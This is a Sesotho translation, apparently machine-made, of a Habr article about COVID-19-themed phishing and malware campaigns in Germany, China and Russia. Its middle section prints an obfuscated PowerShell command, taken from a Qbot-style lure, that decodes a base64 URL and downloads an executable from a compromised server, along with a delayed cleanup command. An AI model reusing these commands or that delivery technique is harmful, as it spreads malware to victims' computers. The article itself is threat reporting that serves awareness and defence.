Bahlaseli ba ntse ba tsoela pele ho sebelisa sehlooho sa COVID-19 hampe, ba theha litšokelo tse ngata ho basebelisi ba nang le thahasello ho tsohle tse amanang le seoa sena. IN Re se re buile ka hore na ke mefuta efe ea malware e hlahileng ka mor'a coronavirus, 'me kajeno re tla bua ka mekhoa ea boenjiniere ea sechaba eo basebelisi ba linaheng tse fapaneng, ho kenyeletsoa le Russia, ba seng ba kopane le eona. Mekhoa e akaretsang le mehlala li tlas'a sehiloeng.
Hopola ho Re buile ka taba ea hore batho ba ikemiselitse ho bala eseng feela ka coronavirus le seoa sena, empa hape le ka mehato ea tšehetso ea lichelete? Mohlala o motle ke ona. Tlhaselo e khahlang ea phishing e ile ea sibolloa seterekeng sa Jeremane sa North Rhine-Westphalia kapa NRW. Bahlaseli ba ile ba etsa likopi tsa sebaka sa marang-rang sa Lekala la Moruo (), moo mang kapa mang a ka etsang kopo ea thuso ea lichelete. Lenaneo le joalo le hlile le teng, 'me le bile molemo bakeng sa scammers. Ha ba se ba fumane lintlha tsa botho tsa bahlaseluoa ba bona, ba ile ba etsa kopo webosaeteng ea 'nete ea bosebeletsi, empa ba bonts'a lintlha tse ling tsa banka. Ho ea ka lintlha tsa molao, likopo tse joalo tsa bohata tse likete tse 4 li ile tsa etsoa ho fihlela morero o fumanoa. Ka lebaka leo, liranta tse limilione tse 109 tse neng li reretsoe baahi ba amehileng li ile tsa oela matsohong a baqhekelli.
O ka thabela tlhahlobo ea mahala bakeng sa COVID-19?
Mohlala o mong oa bohlokoa oa phishing-themed coronavirus e bile ka li-imeile. Melaetsa e ile ea hohela tlhokomelo ea basebelisi ka tlhahiso ea ho etsa tlhahlobo ea mahala bakeng sa ts'oaetso ea coronavirus. Sehlomathisong sa tsena ho bile le mehlala ea Trickbot/Qakbot/Qbot. 'Me ha ba batlang ho hlahloba bophelo ba bona ba qala ho "tlatsa foromo e khomaretsoeng," mongolo o kotsi o ile oa kopitsoa k'homphieutheng. 'Me e le ho qoba tlhahlobo ea sandboxing, script e ile ea qala ho khoasolla kokoana-hloko e ka sehloohong feela ka mor'a nako e itseng, ha mekhoa ea tšireletso e kholisehile hore ha ho mosebetsi o kotsi o tla etsahala.
Ho kholisa basebelisi ba bangata ho nolofalletsa li-macros le hona ho ne ho le bonolo. Ho etsa sena, ho ile ha sebelisoa leqheka le tloaelehileng: ho tlatsa lethathamo la lipotso, pele u lokela ho nolofalletsa macros, ho bolelang hore u hloka ho tsamaisa script ea VBA.
Joalo ka ha u bona, mongolo oa VBA o patiloe ka ho khetheha ho tsoa ho li-antivirus.
Windows e na le karolo ea ho leta moo sesebelisoa se emelang /T <metsotsoana> pele e amohela karabo ea kamehla ea "E". Tabeng ea rona, script e ile ea ema metsotsoana e 65 pele e hlakola lifaele tsa nakoana:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
'Me ha re ntse re emetse, malware e ile ea kopitsoa. Ho ile ha qalisoa script e khethehileng ea PowerShell bakeng sa sena:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Kamora ho hlakisa boleng ba Base64, mongolo oa PowerShell o khoasolla ntlo e ka morao e fumanehang ho seva sa webo se neng se hapiloe ho tsoa Jeremane:
http://automatischer-staubsauger.com/feature/777777.pngmme e e boloka tlasa lebitso:
C:UsersPublictmpdirfile1.exe
ba foldara ‘C:UsersPublictmpdir’ e hlakolwa ha o tsamaisa faele ya 'tmps1.bat' e nang le taelo cmd /c mkdir ""C:UsersPublictmpdir"".
Tlhaselo e lebisitsoeng ho mekhatlo ea mmuso
Ntle le moo, bahlahlobisisi ba FireEye ba sa tsoa tlaleha tlhaselo e lebisitsoeng ea APT32 e lebisitsoeng ho meaho ea mmuso e Wuhan, hammoho le Lekala la Ts'ebetso ea Tšohanyetso la China. E 'ngoe ea li-RTF tse ajoang e ne e na le sehokelo sa sengoloa sa New York Times se nang le sehlooho se reng . Leha ho le joalo, ha u e bala, malware e ile ea kopitsoa (bahlahlobisisi ba FireEye ba ile ba tsebahatsa mohlala oo e le METALJACK).
Ho khahlisang, ka nako ea ho sibolloa, ha ho le e 'ngoe ea li-antivirus e ileng ea bona ketsahalo ena, ho latela Virustotal.
Ha liwebsaete tsa semmuso li theohile
Mohlala o tsotehang ka ho fetisisa oa tlhaselo ea phishing e etsahetse Russia ka tsatsi le leng feela. Lebaka la sena e ne e le ho khethoa ha melemo eo e leng khale e letetsoe bakeng sa bana ba lilemo tse 3 ho isa ho tse 16. Ha qalo ea ho amohela likopo e phatlalatsoa ka la 12 Motšeanong, 2020, batho ba limilione ba ile ba potlakela ho webosaete ea Litšebeletso tsa Naha bakeng sa thuso eo e leng khale e letetsoe mme ba theola portal ho feta tlhaselo ea setsebi ea DDoS. Ha mopresidente a re "Litšebeletso tsa 'Muso li sitoa ho sebetsana le phallo ea likopo," batho ba ile ba qala ho bua Inthaneteng ka ho qalisoa ha sebaka se seng sa ho amohela likopo.
Bothata ke hore libaka tse 'maloa li ile tsa qala ho sebetsa hang-hang,' me ha e le 'ngoe, ea sebele ho posobie16.gosuslugi.ru, e hlile e amohela likopo, ho feta .
Basebetsi-'moho ho tsoa ho SearchInform ba fumane libaka tse ka bang 30 tsa bomenemene sebakeng sa .ru. Infosecurity le Softline Company li latetse liwebosaete tse tšoanang tsa litšebeletso tsa 'muso tse fetang 70 ho tloha qalong ea Mmesa. Baetsi ba bona ba sebelisa matšoao a tloaelehileng hape ba sebelisa motsoako oa mantsoe gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, joalo-joalo.
Hype le boenjiniere ba sechaba
Mehlala ena kaofela e tiisa feela hore bahlaseli ba atleha ho etsa chelete ka taba ea coronavirus. 'Me ha tsitsipano ea sechaba e ntse e phahama le mathata a sa hlakang, ho na le menyetla e mengata ea scammers ea ho utsoa lintlha tsa bohlokoa, ho qobella batho ho fana ka chelete ea bona ka bobona, kapa ho senya lik'homphieutha tse ngata.
Hape kaha seoa sena se qobelletse batho bao e ka bang ba sa itokisetsa ho sebetsa malapeng ka bongata, eseng feela ea botho, empa le data ea khoebo e kotsing. Mohlala, haufinyane basebelisi ba Microsoft 365 (eo pele e neng e le Office 365) le bona ba ile ba hlaseloa ke phishing. Batho ba ile ba amohela melaetsa ea lentsoe e "fetileng" e mengata e le lihokelo tsa mangolo. Leha ho le joalo, lifaele e ne e hlile e le leqephe la HTML le rometseng bahlaseluoa ba tlhaselo ho . Ka lebaka leo, tahlehelo ea phihlello le ho sekisetsa data eohle ho tsoa akhaonteng.
Source: www.habr.com